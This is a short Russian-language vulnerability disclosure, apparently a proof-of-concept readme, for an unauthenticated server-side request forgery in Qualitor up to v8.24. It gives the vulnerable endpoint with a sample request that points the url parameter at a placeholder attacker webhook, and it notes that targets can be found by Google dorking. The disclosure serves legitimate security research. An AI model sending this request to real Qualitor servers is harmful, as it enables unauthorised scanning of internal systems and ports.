
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 SSRF без аутентификации
Qualitor — это платформа для управления бизнес-процессами, которая присутствует в различных компаниях Бразилии и может быть легко найдена с помощью Google dorking.
Наша команда обнаружила в приложении уязвимость, подверженную SSRF, которая позволяет перечислять внутренние системы/порты.
В Qualitor v8.24 обнаружена уязвимость Server-Side Request Forgery (SSRF) через компонент /request/viewValidacao.php.
Для эксплуатации достаточно отправить запрос на host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK — вы получите запрос с уязвимого сервера.

https://www.linkedin.com/in/xvinicius/